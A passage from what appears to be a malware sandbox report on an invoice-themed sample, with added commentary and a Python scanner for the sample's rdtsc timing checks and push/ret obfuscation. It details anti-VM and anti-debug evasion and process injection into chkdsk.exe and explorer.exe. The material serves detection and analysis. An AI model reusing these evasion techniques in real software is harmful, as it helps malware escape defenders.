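        print(f"{rule:34s} pid={pid}")
```

The self-deletion rule is the strongest of the four because it ties the command line back to the chain's own ancestry rather than to a fixed path; the explorer.exe rule is the weakest and is worth keeping only because injected explorer.exe launching a bare system utility is otherwise hard to see. On real telemetry, normalize paths (8.3 names, device paths) before the string comparisons.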
Source: INVOICE_90990_PDF.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: chkdsk.pdbGCTL source: INVOICE_90990_PDF.exe, 00000002.00000002.313490785.0000000000789000.00000004.00000020.sdmp
          Source: Binary string: C:\xampp\htdocs\Loct\3ec9815872b24c7398dfa8b3102e9d98\Loader\Project1\Release\Project1.pdb source: INVOICE_90990_PDF.exe
          Source: Binary string: chkdsk.pdb source: INVOICE_90990_PDF.exe, 00000002.00000002.313490785.0000000000789000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: INVOICE_90990_PDF.exe, 00000000.00000003.225868321.0000000003B40000.00000004.00000001.sdmp, INVOICE_90990_PDF.exe, 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, chkdsk.exe, 00000011.00000002.493007627.0000000004F0F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: INVOICE_90990_PDF.exe, chkdsk.exe, 00000011.00000002.493007627.0000000004F0F000.00000040.00000001.sdmp

          Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Unpacked PE file: 2.2.INVOICE_90990_PDF.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R; vs .text:ER;
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 0_2_00403116 push ecx; ret 0_2_00403129
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_0041BA45 push esi; ret 2_2_0041BAA2
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_0041B3C5 push eax; ret 2_2_0041B418
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_0041B47C push eax; ret 2_2_0041B482
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_0041B412 push eax; ret 2_2_0041B418
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_0041B41B push eax; ret 2_2_0041B482
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_0041C4FB push cs; iretd 2_2_0041C503
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_0041C52C push dword ptr [2E33947Ah]; ret 2_2_0041C7DC
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00415D3C push ebx; ret 2_2_00415D3D
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_0041C580 push dword ptr [2E33947Ah]; ret 2_2_0041C7DC
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_0041C7DD push dword ptr [2E33947Ah]; ret 2_2_0041C7DC
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_00C3D0D1 push ecx; ret 2_2_00C3D0E4
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CDC4FB push cs; iretd 17_2_04CDC503
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CDB47C push eax; ret 17_2_04CDB482
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CDB41B push eax; ret 17_2_04CDB482
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CDB412 push eax; ret 17_2_04CDB418
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CDC580 push dword ptr [2E33947Ah]; ret 17_2_04CDC7DC
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CDC52C push dword ptr [2E33947Ah]; ret 17_2_04CDC7DC
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CD5D3C push ebx; ret 17_2_04CD5D3D
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CDC7DD push dword ptr [2E33947Ah]; ret 17_2_04CDC7DC
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CDBA45 push esi; ret 17_2_04CDBAA2
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 17_2_04CDB3C5 push eax; ret 17_2_04CDB418
Source: C:\Windows\SysWOW64\chkdsk.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00 rdtsc; 0x02 xor ecx, ecx; 0x04 add ecx, eax; 0x06 rdtsc
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00 rdtsc; 0x02 xor ecx, ecx; 0x04 add ecx, eax; 0x06 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe | RDTSC instruction interceptor: First address: 0000000004CC85F4 second address: 0000000004CC85FA instructions: 0x00 rdtsc; 0x02 xor ecx, ecx; 0x04 add ecx, eax; 0x06 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe | RDTSC instruction interceptor: First address: 0000000004CC898E second address: 0000000004CC8994 instructions: 0x00 rdtsc; 0x02 xor ecx, ecx; 0x04 add ecx, eax; 0x06 rdtsc
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 2_2_004088C0 rdtsc
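The RDTSC rows above show the whole timing check: two rdtsc instructions six bytes apart with the first result saved into ecx in between, so the difference measures how long the trivial instructions took, and a hypervisor that traps or virtualizes the time-stamp counter inflates that difference. The same low-order addresses (0x4085F4 in the sample, 0x4CC85F4 in chkdsk.exe) recur in both processes, consistent with the payload in chkdsk.exe being the injected copy of the one in process 2; the push reg; ret and push dword ptr [2E33947Ah]; ret gadgets listed under Data Obfuscation show the same pairing. The Python below is an added example, not part of the Joe Sandbox report and not FormBook's code: it scans a byte buffer for closely spaced rdtsc pairs and for push/ret return-oriented jumps, serving both the Data Obfuscation rows and the RDTSC rows. The buffer is constructed here from the instruction sequences the report prints (plus padding and a prologue), and the 16-byte window is an assumption.

```python
"""Static scan for the rdtsc timing pair and the push/ret gadgets the report lists.

Added example, not part of the Joe Sandbox report and not FormBook code. The
sample buffer is constructed from the instruction sequences the report prints;
the pair window (max_gap) is an assumption, not a value from the report.
"""
import re

RDTSC = b"\x0f\x31"                  # rdtsc opcode

# Constructed buffer: a prologue, the report's timing check (rdtsc; xor ecx,ecx;
# add ecx,eax; rdtsc), padding, then three of the report's push/ret gadgets.
SAMPLE_CODE = (
    b"\x55\x8b\xec"                          # push ebp; mov ebp, esp
    + RDTSC + b"\x31\xc9\x01\xc1" + RDTSC    # rdtsc; xor ecx,ecx; add ecx,eax; rdtsc
    + b"\x90" * 20                           # nop padding
    + b"\x51\xc3"                            # push ecx; ret
    + b"\x90" * 5
    + b"\x50\xc3"                            # push eax; ret
    + b"\xff\x35\x7a\x94\x33\x2e\xc3"        # push dword ptr [2E33947Ah]; ret
)

# push r32 (50..57) | push imm32 (68 xx xx xx xx) | push dword ptr [disp32]
# (FF 35 xx xx xx xx), each immediately followed by ret (C3).
PUSH_RET_RE = re.compile(rb"(?:[\x50-\x57]|\x68.{4}|\xff\x35.{4})\xc3", re.DOTALL)


def find_rdtsc_pairs(code, max_gap=16):
    """Offsets (first, second) of rdtsc pairs no more than max_gap bytes apart.

    A pair this close is a timing probe: the code between them is what gets
    timed, and a trapping hypervisor makes the measured delta balloon.
    """
    offsets = [m.start() for m in re.finditer(re.escape(RDTSC), code)]
    return [(a, b) for a, b in zip(offsets, offsets[1:]) if 0 < b - a <= max_gap]


def timed_instructions(code, pair):
    """The raw bytes between a rdtsc pair (what the check actually measures)."""
    first, second = pair
    return code[first + len(RDTSC):second]


def find_push_ret(code):
    """Offsets and bytes of push ...; ret sequences (obfuscated jumps)."""
    return [(m.start(), m.group()) for m in PUSH_RET_RE.finditer(code)]


def summarize(code):
    """Counts a triage script would attach to a dumped code region."""
    return {
        "rdtsc_pairs": len(find_rdtsc_pairs(code)),
        "push_ret_gadgets": len(find_push_ret(code)),
    }


if __name__ == "__main__":
    for pair in find_rdtsc_pairs(SAMPLE_CODE):
        print("rdtsc pair at", pair, "times", timed_instructions(SAMPLE_CODE, pair).hex())
    for off, raw in find_push_ret(SAMPLE_CODE):
        print(f"push/ret gadget at {off}: {raw.hex()}")
    print(summarize(SAMPLE_CODE))
```

Byte-pattern matching has no notion of instruction boundaries, so run it over executable sections only and confirm hits with a disassembler before treating them as evidence; 0x0F 0x31 and 0x50..0x57 followed by 0xC3 occur by chance in data and in immediates. The sandbox's rows are stronger precisely because they come from executed instructions.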
          Source: C:\Windows\SysWOW64\chkdsk.exe TID: 4776Thread sleep time: -38000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 0_2_004074A7 FindFirstFileExW,0_2_004074A7
          Source: explorer.exe, 00000005.00000000.252276617.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000000.252879010.0000000008BB0000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.251741765.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.240320968.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.268424714.000000000374F000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.253074666.0000000008C68000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}((
          Source: explorer.exe, 00000005.00000000.265841146.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000005.00000000.252354388.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000005.00000000.246351098.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000005.00000000.251741765.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.251741765.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.252354388.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: INVOICE_90990_PDF.exeBinary or memory string: `vmcI
          Source: explorer.exe, 00000005.00000000.251741765.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\chkdsk.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_004088C0 rdtsc 2_2_004088C0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00409B30 LdrLoadDll,2_2_00409B30
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 0_2_00402E84 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00402E84
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 0_2_004081DD mov eax, dword ptr fs:[00000030h]0_2_004081DD
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 0_2_00405F4E mov eax, dword ptr fs:[00000030h]0_2_00405F4E
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 0_2_021F06DA mov eax, dword ptr fs:[00000030h]0_2_021F06DA
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 0_2_021F0A1C mov eax, dword ptr fs:[00000030h]0_2_021F0A1C
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 0_2_021F08EE mov eax, dword ptr fs:[00000030h]0_2_021F08EE
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 0_2_021F099F mov eax, dword ptr fs:[00000030h]0_2_021F099F
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 0_2_021F09DE mov eax, dword ptr fs:[00000030h]0_2_021F09DE
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]2_2_00C7B8D0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C7B8D0 mov ecx, dword ptr fs:[00000030h]2_2_00C7B8D0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]2_2_00C7B8D0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]2_2_00C7B8D0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]2_2_00C7B8D0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]2_2_00C7B8D0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE9080 mov eax, dword ptr fs:[00000030h]2_2_00BE9080
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C63884 mov eax, dword ptr fs:[00000030h]2_2_00C63884
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C63884 mov eax, dword ptr fs:[00000030h]2_2_00C63884
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE58EC mov eax, dword ptr fs:[00000030h]2_2_00BE58EC
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]2_2_00C120A0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]2_2_00C120A0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]2_2_00C120A0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]2_2_00C120A0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]2_2_00C120A0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]2_2_00C120A0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C290AF mov eax, dword ptr fs:[00000030h]2_2_00C290AF
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C1F0BF mov ecx, dword ptr fs:[00000030h]2_2_00C1F0BF
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C1F0BF mov eax, dword ptr fs:[00000030h]2_2_00C1F0BF
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C1F0BF mov eax, dword ptr fs:[00000030h]2_2_00C1F0BF
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C00050 mov eax, dword ptr fs:[00000030h]2_2_00C00050
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C00050 mov eax, dword ptr fs:[00000030h]2_2_00C00050
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BFB02A mov eax, dword ptr fs:[00000030h]2_2_00BFB02A
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BFB02A mov eax, dword ptr fs:[00000030h]2_2_00BFB02A
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BFB02A mov eax, dword ptr fs:[00000030h]2_2_00BFB02A
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BFB02A mov eax, dword ptr fs:[00000030h]2_2_00BFB02A
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CA2073 mov eax, dword ptr fs:[00000030h]2_2_00CA2073
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CB1074 mov eax, dword ptr fs:[00000030h]2_2_00CB1074
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C67016 mov eax, dword ptr fs:[00000030h]2_2_00C67016
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C67016 mov eax, dword ptr fs:[00000030h]2_2_00C67016
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C67016 mov eax, dword ptr fs:[00000030h]2_2_00C67016
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CB4015 mov eax, dword ptr fs:[00000030h]2_2_00CB4015
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CB4015 mov eax, dword ptr fs:[00000030h]2_2_00CB4015
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C1002D mov eax, dword ptr fs:[00000030h]2_2_00C1002D
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C1002D mov eax, dword ptr fs:[00000030h]2_2_00C1002D
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C1002D mov eax, dword ptr fs:[00000030h]2_2_00C1002D
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C1002D mov eax, dword ptr fs:[00000030h]2_2_00C1002D
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C1002D mov eax, dword ptr fs:[00000030h]2_2_00C1002D
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C741E8 mov eax, dword ptr fs:[00000030h]2_2_00C741E8
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C0C182 mov eax, dword ptr fs:[00000030h]2_2_00C0C182
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C1A185 mov eax, dword ptr fs:[00000030h]2_2_00C1A185
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C12990 mov eax, dword ptr fs:[00000030h]2_2_00C12990
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BEB1E1 mov eax, dword ptr fs:[00000030h]2_2_00BEB1E1
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BEB1E1 mov eax, dword ptr fs:[00000030h]2_2_00BEB1E1
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BEB1E1 mov eax, dword ptr fs:[00000030h]2_2_00BEB1E1
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C669A6 mov eax, dword ptr fs:[00000030h]2_2_00C669A6
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C161A0 mov eax, dword ptr fs:[00000030h]2_2_00C161A0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C161A0 mov eax, dword ptr fs:[00000030h]2_2_00C161A0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C651BE mov eax, dword ptr fs:[00000030h]2_2_00C651BE
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C651BE mov eax, dword ptr fs:[00000030h]2_2_00C651BE
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C651BE mov eax, dword ptr fs:[00000030h]2_2_00C651BE
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C651BE mov eax, dword ptr fs:[00000030h]2_2_00C651BE
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C0B944 mov eax, dword ptr fs:[00000030h]2_2_00C0B944
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C0B944 mov eax, dword ptr fs:[00000030h]2_2_00C0B944
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE9100 mov eax, dword ptr fs:[00000030h]2_2_00BE9100
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE9100 mov eax, dword ptr fs:[00000030h]2_2_00BE9100
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE9100 mov eax, dword ptr fs:[00000030h]2_2_00BE9100
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BEB171 mov eax, dword ptr fs:[00000030h]2_2_00BEB171
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BEB171 mov eax, dword ptr fs:[00000030h]2_2_00BEB171
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BEC962 mov eax, dword ptr fs:[00000030h]2_2_00BEC962
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C04120 mov eax, dword ptr fs:[00000030h]2_2_00C04120
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C04120 mov eax, dword ptr fs:[00000030h]2_2_00C04120
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C04120 mov eax, dword ptr fs:[00000030h]2_2_00C04120
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C04120 mov eax, dword ptr fs:[00000030h]2_2_00C04120
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C04120 mov ecx, dword ptr fs:[00000030h]2_2_00C04120
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C1513A mov eax, dword ptr fs:[00000030h]2_2_00C1513A
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C1513A mov eax, dword ptr fs:[00000030h]2_2_00C1513A
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C12ACB mov eax, dword ptr fs:[00000030h]2_2_00C12ACB
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BFAAB0 mov eax, dword ptr fs:[00000030h]2_2_00BFAAB0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BFAAB0 mov eax, dword ptr fs:[00000030h]2_2_00BFAAB0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE52A5 mov eax, dword ptr fs:[00000030h]2_2_00BE52A5
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE52A5 mov eax, dword ptr fs:[00000030h]2_2_00BE52A5
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE52A5 mov eax, dword ptr fs:[00000030h]2_2_00BE52A5
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE52A5 mov eax, dword ptr fs:[00000030h]2_2_00BE52A5
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE52A5 mov eax, dword ptr fs:[00000030h]2_2_00BE52A5
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C12AE4 mov eax, dword ptr fs:[00000030h]2_2_00C12AE4
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C1D294 mov eax, dword ptr fs:[00000030h]2_2_00C1D294
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C1D294 mov eax, dword ptr fs:[00000030h]2_2_00C1D294
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C1FAB0 mov eax, dword ptr fs:[00000030h]2_2_00C1FAB0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C74257 mov eax, dword ptr fs:[00000030h]2_2_00C74257
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BEAA16 mov eax, dword ptr fs:[00000030h]2_2_00BEAA16
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BEAA16 mov eax, dword ptr fs:[00000030h]2_2_00BEAA16
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C9B260 mov eax, dword ptr fs:[00000030h]2_2_00C9B260
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C9B260 mov eax, dword ptr fs:[00000030h]2_2_00C9B260
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CB8A62 mov eax, dword ptr fs:[00000030h]2_2_00CB8A62
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE5210 mov eax, dword ptr fs:[00000030h]2_2_00BE5210
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE5210 mov ecx, dword ptr fs:[00000030h]2_2_00BE5210
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE5210 mov eax, dword ptr fs:[00000030h]2_2_00BE5210
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE5210 mov eax, dword ptr fs:[00000030h]2_2_00BE5210
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BF8A0A mov eax, dword ptr fs:[00000030h]2_2_00BF8A0A
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C2927A mov eax, dword ptr fs:[00000030h]2_2_00C2927A
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C03A1C mov eax, dword ptr fs:[00000030h]2_2_00C03A1C
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C24A2C mov eax, dword ptr fs:[00000030h]2_2_00C24A2C
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C24A2C mov eax, dword ptr fs:[00000030h]2_2_00C24A2C
